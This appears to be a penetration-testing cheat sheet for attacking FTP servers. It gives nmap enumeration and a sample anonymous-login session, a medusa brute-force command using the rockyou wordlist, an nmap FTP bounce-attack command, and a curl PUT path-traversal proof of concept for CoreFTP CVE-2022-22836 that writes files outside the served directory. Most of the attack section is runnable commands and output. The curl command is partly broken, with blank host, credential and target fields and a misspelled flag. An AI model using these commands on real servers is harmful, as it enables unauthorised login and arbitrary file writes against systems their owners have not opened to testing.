FTP

The File Transfer Protocol ( FTP ) is a standard network protocol used to transfer files between computers. It also performs directory and files operations, such as changing the working directory, listing files, and renaming and deleting directories or files. By default, FTP listens on port TCP/21 .

Enumeration

We can use Nmap default scripts -sC and -sV

• -sC checks if anonymous login is allow or not
• -sV It give the banner, version name.

nmap -sC -sV 

ATTACKS

1. Anonymous Authentication

Without password We can login in FTP with Anonymous Authentication.

ftp 192.168.2.142

anonymous

ftp 192.168.2.142

Connected to 192.168.2.142.
220 (vsFTPd 2.3.4)
Name (192.168.2.142:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

• Use get to Download files and mget for multiple files.
• Use put to upload files and mput for multiple.

2. Brute Forcing

If 1 method fails, I will use medusa for this

• -U is used for list and -u for single name.
• -P for list and -p for single password.
• -M for protocol we have ftp here.
• -h host name

medusa -U /Path/to/Wordlist -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp

3. FTP Bounce Attack

An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. The attacker uses a PORT command to trick the FTP connection into running commands and getting information from a device other than the intended server.

nmap -b is used for bounce attack

nmap -Pn -v -n -p80 -b anonymous:[email protected] 172.17.0.2

Latest FTP Vulnerabilities

The CoreFTP before build 727 vulnerability assigned CVE2022-22836. This vulnerability is for an FTP service that does not correctly process the HTTP PUT request and leads to an authenticated directory / path traversal, and arbitrary file write vulnerability. This vulnerability allows us to write files outside the directory to which the service has access.

This FTP service uses an HTTP POST request to upload files. However, the CoreFTP service allows an HTTP PUT request, which we can use to write content to files.

curl -k -X PUT -H "Host: " --basic -u : --databinary "PoC." --path-as-is https:///../../../../../../whoops

We create a raw HTTP PUT request ( -X PUT ) with basic auth ( —basic -u : ), the path for the file ( —path-as-is https:///../../../../../whoops ), and its content ( —data-binary “PoC.” ) with this command. Additionally, we specify the host header ( -H “Host: ” ) with the IP address of our target system.